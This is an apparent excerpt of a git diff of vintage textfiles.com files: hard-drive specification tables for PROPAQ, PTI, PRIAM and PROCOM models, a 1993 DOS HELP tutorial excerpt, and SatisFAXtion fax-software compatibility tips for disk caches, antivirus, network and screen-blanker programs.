ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PROPAQ 80i 3.50 1.0" 80.0MB IDE(AT) 19ms 12.0Mb 150K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + Si 200/PS3 3.50 HALF 209.0MB 4 SCSI (2,7)RLL 18ms 12.0Mb 70K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HiPer 380 5.25 388.0MB 8 ESDI 17ms 100K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + Si 1000/S5 5.25 1037.0MB 8 SCSI 15ms 19.2Mb 40K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + Si 585/S5 5.25 601.0MB 8 SCSI 17ms 22.4Mb 100K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PTI + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PT-225 3.50 HALF 21.0MB 615 17 2 4 ST506/412 (1,3)RLL 35ms 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PT-234 3.50 HALF 28.0MB 820 17 2 4 ST506/412 (1,3)RLL 35ms 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PT-238A 3.50 HALF 32.0MB 615 26 2 4 IDE(AT) (2,7)RLL 35ms 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PT-238R 3.50 HALF 32.0MB 615 26 2 4 ST506/412 (2,7)RLL 35ms 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PT-238S 3.50 HALF 32.0MB 615 26 2 4 SCSI (2,7)RLL 35ms 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PT-251A 3.50 HALF 43.0MB 820 26 2 4 IDE(AT) (2,7)RLL 35ms 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PT-251R 3.50 HALF 43.0MB 820 26 2 4 ST506/412 (2,7)RLL 35ms 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PT-251S 3.50 HALF 43.0MB 820 26 2 4 SCSI (2,7)RLL 35ms 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PT-338 3.50 HALF 32.0MB 615 17 3 6 ST506/412 (1,3)RLL 35ms 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PT-351 3.50 HALF 42.0MB 820 17 3 6 ST506/412 (1,3)RLL 35ms 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PT-351R 3.50 HSLF 60.0MB ST506/412 (2,7)RLL 30ms + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + + + + + + -------PHYSICAL-------- ÄLOGICALÄÄ PAGE 44 + --SIZE-- -----CAPACITY---- PRE- LAND S/ # RW HD INTER- S/ RW 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ST ADDITIONAL COMMENTS + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + PRIAM 5.25 3 1018 17 ST506/412 23ms 5.0Mb + ID60AT 59.0MB FULL 5 VC (1,3)RLL + AUTO + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 5.25 4 1018 17 ST506/412 23ms 5.0Mb + ID62AT/D2 62.0MB FULL 7 VC (1,3)RLL + AUTO + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 5.25 ESDI 16ms 15.0Mb + ID660-U 660.0MB 15 VC (2,7)RLL 150K + AUTO + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 5.25 ESDI + ID700E 701.0MB FULL (2,7)RLL + + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 5.25 SCSI + ID700S 668.0MB FULL (2,7)RLL + + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 5.25 4 1166 26 ST506/412 18ms 7.5Mb + ID75RC 72.0MB FULL 7 VC (2,7)RLL + AUTO + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 5.25 4 755 17 ST506/412 22ms 5.0Mb + P502 46.0MB FULL 7 (1,3)RLL + + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 5.25 4 755 17 ST506/412 22ms 5.0Mb + P504 46.0MB FULL 7 (1,3)RLL + + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 5.25 6 1224 17 ST506/412 22ms 5.0Mb + P514 117.0MB FULL 11 (1,3)RLL + + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 5.25 8 1224 17 ST506/412 22ms 5.0Mb + P519 160.0MB FULL 15 (1,3)RLL + + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 5.25 4 1225 ESDI 20ms 10.0Mb + P617 153.0MB FULL 7 (2,7)RLL + + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 5.25 6 1225 ESDI 20ms 10.0Mb + P628 241.0MB FULL 11 (2,7)RLL + + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 382.0MB 5.25 8 1225 ESDI 20ms 10.0Mb + P638 329.0MB FULL 15 (2,7)RLL + + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + ÚPHYSICAL¿ LOG. PAGE 95 + MANUFACTURER UNFORMAT WTH. PL CYLS ST CYLS INTERFACE ACC XFER. POWER + MODEL NUMBER FORMATED HGT. HD PREC AC HDS REC.METH T-T CACHE MTBF + L.Z. ST ADDITIONAL COMMENTS + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + PRIAM 5.25 4 1225 SCSI 20ms 10.0Mb + P717 153.0MB FULL 7 (2,7)RLL + + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 5.25 6 1225 SCSI 20ms 10.0Mb + P728 241.0MB FULL 11 (2,7)RLL + + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 382.0MB 5.25 8 1225 SCSI 20ms 10.0Mb + P738 329.0MB FULL 15 (2,7)RLL + + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 5.25 2 987 26 ST506/412 7.5Mb + V130R 39.0MB FULL 3 (2,7)RLL + see also VERTEX V130 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 5.25 3 987 17 ST506/412 5.0Mb + V150 42.0MB FULL 5 (1,3)RLL + see also VERTEX V150 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 5.25 3 1166 17 ST506/412 5.0Mb + V160 50.0MB FULL 5 (1,3)RLL + see also VERTEX V170 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 5.25 4 987 17 ST506/412 28ms 5.0Mb + V170 60.0MB FULL 7 (1,3)RLL + + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 5.25 4 987 26 ST506/412 7.5Mb + V170R 91.0MB FULL 7 (2,7)RLL + + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRIAM 5.25 4 1166 17 ST506/412 28ms 5.0Mb + V185 72.0MB FULL 7 (1,3)RLL + + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PROCOM TECH. 1900.0MB SCSI-2F 13ms + MTD1900 NONE + AUTO EXTERNAL MAC + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PROCOM TECH. 2000.0MB SCSI-2F 11ms + MTD2000 NONE + AUTO EXTERNAL MAC, 5,400 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PROCOM TECH. 1900.0MB SCSI-2F 13ms + QD1900 NONE + AUTO INTERNAL MAC + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PROCOM TECH. 2000.0MB SCSI-2F 11ms + QD2000 NONE + AUTO INTERNAL MAC, 5,400 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + ÚPHYSICAL¿ LOG. PAGE 96 + MANUFACTURER UNFORMAT WTH. PL CYLS ST CYLS INTERFACE ACC XFER. POWER + MODEL NUMBER FORMATED HGT. HD PREC AC HDS REC.METH T-T CACHE MTBF + L.Z. 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When the cursor is on the command where you want + help, press: + + + + To get detailed information on any particular DOS command, at + the system prompt type HELP followed by a space and the + command that you want information on. For example, if you want + help on the DIR command, type: + + help dir + + A screen of information is shown with Notes and Examples at the + top. Press N for Notes or E for Examples. The cursor will then + go to the one you selected. Then press: + + + + You can use your arrow keys to scroll through the text. You can + also press or to scroll one page at a time. + If you select E for Examples, you are shown actual examples of + how to use the command. If you want to search for a key word or + phrase, you can start the search process by pressing: + + + s + + Then just follow the screen prompts. + + + Printing HELP Information + + You can print the HELP information you are viewing by pressing: + + + f + p + + + I recommend printing the help information, so you can have a + copy to use beside your computer. If you do this for all the DOS + commands, you can print your own personalized DOS manual! + + + + HELP with Other Commands + + While you are using the DOS HELP, you can get a table of + contents of all the covered commands by pressing: + + + c + + + Anytime you are using DOS HELP and want assistance on how to + get around in HELP, press the function key labeled: + + + + + Getting Out of HELP + + To get out of HELP and return to the DOS prompt, type: + + + f + x + + + + This section is finished. It is an excerpt from LEARNING DOS FOR + THE COMPLETE NOVICE, by Steven Woas, copyright 1993. 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Disk cache programs reset +some internal values that are needed in unaltered form by Casmgr. It +can cause Casmgr to corrupt the hard disk. + +Norton Disk Cache +This program can cause the error "SatisFAXtion board not responding" +if write caching is turned on. Turn off write caching and SatisFAXtion +will work fine. + +PC-Cache +When using PC-Cache with SatisFAXtion, turn off the caching of disk +writes by adding the following option to the PC-Cache command line +in the autoexec.bat file: + + /WRITE=OFF + +Super PC-Kwik +May lock up if SatisFAXtion is in the process of accessing the hard +disk to save or send a file while another program is being loaded +from the disk. This happens with versions of SUPER PC-KWIK below 3.1 +when loaded into EXPANDED MEMORY only. The solution is to load +SUPER PC-KWIK with /H- /D- in the command line. This turns off +background reads of the disk track (for HD & Floppies respectively). +The problem has been fixed in version 3.1 of SUPER PC-KWIK. + +V-CACHE by Golden Bow Software +This disk caching software is compatible with Casmgr. However, in +order to prevent lock-up when Casmgr is accessing a diskette, you must +invoke the cache with the /T=0 parameter. + +For other cache programs, consult your manual to determine how to +turn off background disk writes. + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ANTIVIRUS PROGRAMS ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +Antivirus programs can conflict with the SatisFAXtion software. If +you have an antivirus program installed and you have problems with the +SatisFAXtion software, unload the antivirus program (or remove its +command lines from the autoexec.bat and/or config.sys files and restart +your computer) and try again. Contact the manufacturer of the +antivirus program for possible settings that will work with the +SatisFAXtion software. + + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ PC TOOLS SOFTWARE ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +To use the SatisFAXtion software with PC-Shell, make sure that your +autoexec.bat file invokes the SatisFAXtion programs Casmgr and Faxpop +before you invoke the PCSHELL Command. + +Load FAXPOP before invoking PCSHELL. + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ NETWORK SOFTWARE ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +If you're having difficulty (lockups, etc.) with SatisFAXtion, try +reversing the order you are loading your network drivers and Casmgr. +(eg. If currently loading your network driver before Casmgr, try loading +it after, and vice versa.) + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ SCREEN BLANKERS ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +If experiencing difficulty with faxing or lockups, remove any screen +blanking programs which are loading in your autoexec.bat file. diff --git a/textfiles.com/computers/history.txt b/textfiles.com/computers/history.txt new file mode 100644 index 